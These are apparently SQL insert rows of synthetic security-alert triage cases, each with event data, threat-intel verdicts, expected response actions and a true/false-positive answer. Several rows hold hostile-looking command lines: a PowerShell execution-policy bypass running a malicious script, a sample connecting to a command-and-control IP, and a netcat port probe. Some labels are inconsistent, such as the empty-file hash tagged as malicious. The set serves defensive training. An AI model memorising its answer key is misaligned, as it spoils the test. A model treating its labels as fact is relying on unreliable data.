(2185, 'Ghidra Analysis Reveals Obfuscated Malware Behavior', 'medium', 'Ghidra', 'A binary analyzed with Ghidra shows obfuscation techniques commonly used by malware to avoid detection. The binary attempts to execute suspicious scripts.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:54Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"203.0.113.77\",\"username\":\"mjohnson\",\"hostname\":\"developer-workstation\",\"command_line\":\"obfuscation.exe\",\"file_hash\":\"098f6bcd4621d373cade4e832627b4f6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP used in phishing and malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"098f6bcd4621d373cade4e832627b4f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash linked to obfuscated malware samples\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"obfuscation.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable employs obfuscation, a common malware technique\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s workstation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The obfuscation techniques and network activity confirm the presence of malware.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2186, 'Benign Activity Misclassified as Malware via IDA Pro', 'low', 'IDA Pro', 'A benign application was flagged due to its use of packing techniques similar to those used by malware, but further analysis revealed no malicious intent.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"10.0.0.10\",\"username\":\"kwhite\",\"hostname\":\"packaging-server\",\"command_line\":\"safe_application.exe\",\"file_hash\":\"4621d373cade4e832098f6bcd4b6b8e5\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"4621d373cade4e832098f6bcd4b6b8e5\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash verified as a known clean application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"safe_application.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as safe with no malicious behavior\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the packaging server\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the network\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The application\'s packing techniques are legitimate, resulting in a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2187, 'Cuckoo Sandbox False Positive on Legitimate Software Update', 'low', 'Cuckoo Sandbox', 'A software update process was mistakenly flagged as malicious due to network behavior typical of update processes, but no malicious activity was found.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:03:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.20\",\"dst_ip\":\"192.0.2.5\",\"username\":\"rsmith\",\"hostname\":\"update-server\",\"command_line\":\"update.exe\",\"file_hash\":\"6bcd4621d373cade4e832098f6b8e5f0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"6bcd4621d373cade4e832098f6b8e5f0\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash recognized as a legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command typical of software updates, confirmed harmless\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the update server\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.0.2.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for update distribution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Network traffic was consistent with legitimate update distribution.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2188, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable was detected executing from an unusual directory with signs of obfuscation. Reverse engineering tools suggest potential for malware.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"hostname\":\"workstation123\",\"command_line\":\"C:\\\\Temp\\\\packed_executable.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash reported in multiple malware repositories\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in several malware distribution activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable and associated external IP are flagged as malicious, indicating a potential compromise.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2189, 'Potential False Positive: Executable Detected', 'medium', 'Any.Run', 'An executable was detected running on an employee\'s machine, flagged due to unusual execution patterns, but appears benign.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.90\",\"username\":\"asmith\",\"hostname\":\"laptop789\",\"command_line\":\"C:\\\\Users\\\\asmith\\\\Documents\\\\benign_tool.exe\",\"file_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable is a legitimate tool used by the employee, with no malicious indicators.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2190, 'Malicious Macro Execution Detected', 'critical', 'Ghidra', 'A malicious macro was executed, exploiting document vulnerabilities to gain persistence on the network.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"198.51.100.200\",\"username\":\"kwhite\",\"hostname\":\"desktop456\",\"request_body\":\"Base64: TWFsaWNpb3VzTWFjcm9FeGVjdXRpb24=\",\"command_line\":\"winword.exe /macro MaliciousMacro\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"Base64: TWFsaWNpb3VzTWFjcm9FeGVjdXRpb24=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Macro execution attempt detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro execution indicates an attempt to exploit document vulnerabilities for persistence.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2191, 'Unusual Network Behavior: Internal Traffic Spike', 'medium', 'Cuckoo Sandbox', 'An unexpected spike in internal network traffic was observed, originating from a development server, but analysis shows no malicious intent.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:10:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.55\",\"username\":\"svc_dev\",\"hostname\":\"dev-server01\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic spike was due to a scheduled data migration, not malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2192, 'Malware Command and Control Communication', 'critical', 'IDA Pro', 'A suspected malware sample was analyzed, revealing communication with a known command and control server, indicating a potential compromise.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:50:25Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.20\",\"dst_ip\":\"203.0.113.155\",\"username\":\"nmartin\",\"hostname\":\"server002\",\"command_line\":\"malware_sample.exe /connect 203.0.113.155\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known command and control servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malware_sample.exe /connect 203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates communication with C2 server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication with a known malicious IP suggests a compromised host.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2193, 'Malicious Macro Detected in Email Attachment', 'high', 'Proofpoint', 'A macro-enabled document was detected in an email attachment sent from an unknown external domain. The macro attempts to download additional payloads upon execution.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"email_sender\":\"attacker@example.com\",\"hostname\":\"victim-pc01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\victim\\\\Downloads\\\\malware.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1123 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware analyses\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro-enabled document is designed to execute upon opening, attempting to establish a connection to an external IP for further payload download.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2194, 'Suspicious Network Connection from Internal Machine', 'medium', 'Cuckoo Sandbox', 'An internal machine initiated a network connection to a known Command and Control server. The executable responsible was packed and evaded basic detection.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"jdoe\",\"hostname\":\"workstation-02\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"C:\\\\Program Files\\\\malicious.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP identified as Command and Control server in recent attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Packed executable observed in various malware campaigns\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The network connection to a known C2 server indicates potential data exfiltration or further command execution.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2195, 'Potential Phishing Email with Suspicious Link', 'medium', 'Proofpoint', 'A suspicious email was received containing a link to a malicious domain impersonating a well-known financial institution.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"104.16.45.35\",\"dst_ip\":\"192.168.3.8\",\"email_sender\":\"no-reply@banksecure.com\",\"hostname\":\"user-laptop\",\"url\":\"http://secure-bank-login.com/login\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.16.45.35\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics legitimate bank login page to harvest credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email attempts to deceive the user into entering their credentials on a fake login page.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2196, 'Non-Malicious Base64 Encoded Web Request', 'low', 'Any.Run', 'A web request was detected with Base64 encoded content that initially appeared suspicious but decoded to benign activity.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"203.0.113.45\",\"username\":\"webuser\",\"hostname\":\"webserver-01\",\"request_body\":\"Z2V0IHBhZ2U=\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"Z2V0IHBhZ2U=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Base64 content decoded to harmless command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The Base64 content decoded to a harmless command, indicating routine web activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2197, 'Unusual Internal IP Communication Flagged as Suspicious', 'medium', 'Ghidra', 'An internal IP communicated with another internal IP on an unusual port, initially flagged as suspicious but determined to be benign after analysis.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"nc -zv 10.0.0.10 3389\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP conducting routine administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nc -zv 10.0.0.10 3389\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for legitimate internal network checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The internal communication was part of scheduled maintenance and not indicative of lateral movement.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2198, 'Packed Executable Detected via IDA Pro Analysis', 'high', 'IDA Pro', 'A packed executable was detected through reverse engineering with IDA Pro, exhibiting suspicious execution patterns. The executable attempts to establish a network connection to a known malicious IP.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:32:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"198.51.100.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-12\",\"command_line\":\"C:\\\\Windows\\\\temp\\\\suspicious.exe\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 947 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware signatures\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and hash confirms this as a true positive malware attack.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2199, 'Malicious Macro Document Execution via Ghidra', 'critical', 'Ghidra', 'Ghidra identified a document with malicious macros attempting to execute a PowerShell command to download additional payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.75\",\"username\":\"bsmith\",\"hostname\":\"laptop-09\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bsmith\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to command and control infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a known malware campaign\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal client IP address\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bsmith\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used for downloading additional payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Confirmed malicious activity due to the execution of a known bad hash and malicious PowerShell command.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2200, 'Suspicious Network Connection Detected by Any.Run', 'medium', 'Any.Run', 'A network connection from an internal machine to a suspicious external IP was detected. Further investigation revealed benign software activity.', 'Network Anomaly', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"csmith\",\"hostname\":\"desktop-01\",\"command_line\":\"outbound connection to 203.0.113.100:443\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP occasionally flagged for unusual traffic patterns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address originating the connection\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection was part of a legitimate software update process, not malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2201, 'Malware Analysis via Cuckoo Sandbox', 'critical', 'Cuckoo Sandbox', 'A file submitted to Cuckoo Sandbox exhibited multiple malicious behaviors, including persistence mechanisms and data exfiltration attempts.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.50\",\"username\":\"admin\",\"hostname\":\"server-05\",\"command_line\":\"C:\\\\malicious\\\\run.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash found in malware database with multiple detections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address indicating victim machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The sandbox analysis confirmed malicious behaviors typical of malware, including persistence and communication with a known malicious IP.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2202, 'Suspicious Web Request Detected by Any.Run', 'low', 'Any.Run', 'A web request from an internal IP seemed suspicious but was identified as a legitimate user action after further inspection.', 'Web Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:55:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.0.5\",\"dst_ip\":\"198.51.100.20\",\"username\":\"jdoe\",\"hostname\":\"terminal-03\",\"request_body\":\"GET /index.php?user=jdoe&action=login\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with trusted service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user machine\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /index.php?user=jdoe&action=login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Normal web request pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_anomaly\",\"analysis_notes\":\"The web request was validated as a standard login attempt by the user.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
